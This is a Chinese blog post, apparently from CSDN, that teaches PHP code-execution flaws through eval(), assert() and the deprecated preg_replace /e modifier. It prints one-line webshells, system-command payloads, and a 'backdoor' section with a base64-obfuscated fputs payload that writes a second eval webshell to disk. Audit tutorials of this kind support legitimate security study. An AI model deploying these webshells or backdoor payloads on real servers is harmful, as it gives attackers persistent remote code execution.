PHP代码审计之代码执行(一)

最新推荐文章于 2024-08-13 14:00:00 发布
最新推荐文章于 2024-08-13 14:00:00 发布
阅读量427 收藏
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108541368
版权

PHP代码审计之代码执行(一)


代码执行漏洞成因是由于函数使用不当,本文主要解析造成代码执行的成因

eval()

eval()函数会将传入的字符串当作PHP代码来执行

eval(string $code)

示例:

<?php
$code='phpinfo();';
eval($code);
?>

常见的一句话

<?php
@eval($_REQUEST['pass']);
?>

执行系统命令payload:

?pass=system('whoami');

assert()

assert — 检查一个断言是否为 FALSE
PHP 5

assert ( mixed $assertion [, string $description ] ) : bool

PHP 7

assert ( mixed $assertion [, Throwable $exception ] ) : bool

assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。
如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行
示例:

<?php
	$code = "system(whoami)";
	//$code="phpinfo()";
	assert($code);
?>

一句话:

<?php
@assert($_REQUEST['mm']);
?>

执行系统命令payload:

?mm=system(whoami)

preg_replace()

参考:https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day8/files/README.md
preg_replace — 执行一个正则表达式的搜索和替换

说明

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed

搜索subject中匹配pattern的部分, 以replacement进行替换。

参数

pattern

    要搜索的模式。可以使一个字符串或字符串数组。

    可以使用一些PCRE修饰符。

e (PREG_REPLACE_EVAL)
Warning:这个功能在PHP 5.5.0开始被建议禁用,在PHP 7.0.0后被弃用

当使用被弃用的 e 修饰符时, 这个函数会转义一些字符(即:’、"、 \ 和 NULL) 然后进行后向引用替换。在完成替换后, 引擎会将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串。
用简单的例子进行对比:

echo $_REQUEST['test'];

在这里插入图片描述

preg_replace('/test/e',$_REQUEST['test'],'just for test');
等价于:
eval($_REQUEST['test']);

在这里插入图片描述

示例:

<?php
$html = $_REQUEST['html'];
// uppercase headings
$html = preg_replace(
    '(<h([1-6])>(.*?)</h\1>)e',
    '"<h$1>" . strtoupper("$2") . "</h$1>"',
    $html
);
?>

payload:

?html=<h1>${phpinfo()}</h1>

strtoupper("$2")中使用了双引号,由于PHP的可变变量特性,将双引号中的变量会被解析。
示例:

<?php $a="${phpinfo()}"; ?>

<?php $a="${phpinfo()}"; ?>

制作后门:

<?php 
preg_replace('/test/e', $_REQUEST['h'], 'just for test');
?>

payload:(也可以用加密的方式写入的一句话)

fputs(fopen("bb.php","w"),'qawaasdadss');
fputs(fopen(base64_decode('YmRiLnBocA=='),"w"),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ20nXSk7Pz4='));
//base64_decode('YmRiLnBocA==') ==>bdb.php
//base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ20nXSk7Pz4=')==><?php eval($_POST['m']);?>
tempulcc
关注
专栏目录
php代码审计
qq_48008847的博客
07-12 2454
通用代码审计思路 •根据敏感关键字回溯参数传递过程(逆向追踪) •检查敏感函数的参数,进行回溯变量,判断变量是否可控并且没有经过严格的过滤,这是一个逆向追踪的过程。 •寻找可控参数,正向追踪变量传递过程(正向追踪)•跟踪传递的参数,判断是否存入到敏感函数内或者传递的过程中具有代码逻辑漏洞。 •寻找敏感功能点,通读功能点代码(直接挖掘功能点漏洞)•根据自身经验判断在该应用中的哪些功能可能出现漏洞。 •直接通读全文代码 审计方向: 根据功能点审计:根据业务的功能来进行审计。 用浏览器进行浏览,找
php函数
mr.king
06-08 154
layout: “post” title: “PHP函数;” date: “2019-06-03 21:04” is_null 判断变量是否为空,返回一个boolen值,空返回true,非空返回false; 检测数据类型 is_bool(检测变量是否为bool类型),例子:is_bool(true)、is_bool(false) is_数据类型(变量) file_exists() 函数 fil...
Web 安全 PHP 代码审查之常规漏洞
最新发布
ZL_1618的博客
08-13 623
工欲善其事,必先利其器。我们做代码审计之前选好工具也是十分必要的。下面我给大家介绍两款代码审计中比较好用的工具。功能介绍RIPS 是一款基于 PHP 开发的针对 PHP 代码安全审计的软件。另外,它也是一款开源软件,由国外安全研究员 Johannes Dahse 开发,程序只有 450KB,目前能下载到的最新版是0.55。在写这段文字之前笔者特意读过它的源码,它最大的亮点在于调用了 PHP 内置解析器接口。
良好的书写规范提高PHP代码执行效率
romeoyue的专栏
07-25 276
用单引号代替双引号来包含字符串,这样做会更快一些。因为 php 会在双引号包围的字符串中搜寻变量,单引号则不会,注意:只有 echo 能这么做,它是一种可以把多个字符串当作参数的“函数”(译注:PHP 手册中说 echo 是语言结构,不是真正的函数,故把函数加上了双引号)。        1、如果能将类的方法定义成 static,就尽量定义成 static,它的速度会提升将近4倍。
php代码执行
weixin_45111459的博客
06-24 486
1.eval() 这个最简单,把传递上来的字符串当作代码执行php5 7都能使用,需要注意的是eval是一个语言构造器而不是一个函数,不能被可变函数调用 <?php if(isset($_GET['id'])){ eval($_GET['id']); }else{ echo '请输入参数 id'; } 2.assert() 虽说是在php7上已弃用,会报警告,但是仍然可以使用,实测在php8才正式弃用 <?php $a=$_GET['id']; a...
PHP代码执行函数
weixin_34309435的博客
03-27 1462
危险函数 mixed eval (string $code) 把字符串作为PHP代码执行 bool assert (mixed $assertion [,string $description]) 替代eval函数。相同功能。 mixed preg_replace(mixed $pattern,mixed $replacement,mixed $sub...
php代码审计-代码执行.pdf
12-14
代码审计PHP 代码执行机制中的一种安全机制,用于检查代码的安全性。代码审计可以检查代码中是否存在安全漏洞,例如 eval() 函数、assert() 函数、preg_replace() 函数等。 例如,我们可以使用以下方式来检查...
PHP代码审计文档.zip
11-02
第19课:PHP代码审计之会话认证漏洞mp4 第18课:PHP伪协议mp4 第17课:PHP弱类型mp4 第16课:PHP代码审计之反序列化漏润mp4 第15课:PHP代码审计之变量盖漏洞mp4 第14课PHP代码审计之任意文件读取及删除漏洞mp4 第13课...
php-java+代码审计+代码审计软件seay+程序员+挖洞+代码审计漏洞查找+生成代码审计报告
03-08
代码审计是软件开发生命周期中的关键环节,它不仅能发现代码中的错误和不规范之处,还能帮助开发者了解可能的安全漏洞。通过审计,可以提前预防黑客攻击,避免因安全问题导致的数据泄露或服务中断。对于大型项目,...
php代码审计之命令注入(3)
01-09
`system()` 函数执行一个外部命令,并且将输出直接打印到浏览器。它接受一个命令字符串作为参数,例如 `system('ls')` 将执行Linux系统下的`ls`命令。如果命令执行成功,它会返回命令的最后一条输出;失败则返回 `...
第二阶段 PHP代码审计之命令执行
qq_22132931的博客
11-18 310
PHP代码审计之命令执行
PHP代码审计工具V2.0.3源码20121015
02-22
PHP代码审计工具V2.0.3源码 源码描述: 该版本目前支持单个关键字扫描、批量函数扫描、批量正则匹配,其中正则表达式扫描精确度最高,效率最高。 其他功能: 源码浏览:载入程序源码后,可以在最左边的程序文件列表里面点击浏览源码,扫描出包含关键字的源码,也可以在下边的列表点击直接浏览。代码可以直接复制,或者选择用记事本打开。 漏洞库:每次做代码审计可以在漏洞库建立一个审计文档,方便以后查阅、管理。 扫描配置:自定义扫描函数和正则表达式规则,针对要扫描的程序可以建立不同的规则,其中正则表达式扫描精确度更高。 审计技巧:收集了一下PHP代码审计的资料,提供给新手学习。 程序帮助:一些程序信息和作者信息
PHP-代码执行函数-命令执行函数
weixin_47112073的博客
10-21 6452
简单写一下代码执行函数与命令执行函数有哪些,并且说说他们的不同
PHP常见的命令执行函数与代码执行函数
dys的博客
06-23 6117
命令执行代码执行
PHP中的命令执行代码执行
qq_51754713的博客
10-04 3280
title: PHP中的命令执行代码执行 data: 2021-09-15 tags: CTF-web PHP中的命令执行代码执行 最近在复习之前学过得知识点。因为之前是0基础来学习的,所以很多东西可能是没有弄懂的。现在重新回顾一下命令执行这一块。学到了不少的知识。 然后题目的话全都是来源于CTFSHOW的web入门。 对我这种新手来说真是太友好了! 命令执行代码执行PHP中我们首先要搞清楚什么是代码执行,什么是命令执行。 通俗一点讲,代码执行执行PHP代码。命令执行执行linux系统下.
PHP-代码审计-代码执行
weixin_44110913的博客
08-29 790
概述 类似于SQL注入,可以吧SQL语句注入到SQL服务执行 PHP代码执行则是吧代码 注入应用中最终到WebServer去执行,这样的函数如果没有过滤,相对于存在一个后门代码执行 函数 eval() assert() preg_replace() call_user_func() call_user_func_arry() array_map()等 挖洞经验 eval()和assert()函数导致的代码执行漏洞大多是因为载入缓存或者模板以及对变量的处理不严格导致,比如直接吧一个外部可控的参数直接
PHP代码审计(三)------代码执行注入
wkend的博客
04-05 801
eval代码执行函数 /** isset()函数: 检测变量是否设置,并且不是 NULL。 如果已经使用 unset() 释放了一个变量之后,它将不再是 isset()。若使 用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。同时要注意 的是一个 NULL 字节("\0")并不等同于 PHP 的 NULL 常数。 */ if(isset($_GET['str'...
PHP代码、命令执行及绕过
qq_46001025的博客
10-15 705
NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。Linux下支持glob通配符代替 . 或者叫 period,它的作用和source一样,就是用当前的shell执行一个文件中的命令,例如 .file 就是执行file文件中的命令。数组(Array)的第一个字母是A,在php中,如果强制连接数组和字符串的话,数组会转换成字符串,值为Array;sh a-------------------sh会把 a 里面的每行内容当命令来执行
PHP代码审计 03 代码执行
kevinhanser
07-20 436
本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程 PHP 代码审计博客目录 1. 简介 常见代码执行函数 eval 、assert 、preg_replace 2. 代码执行函数示例 eval() 函数 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行,一般情...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值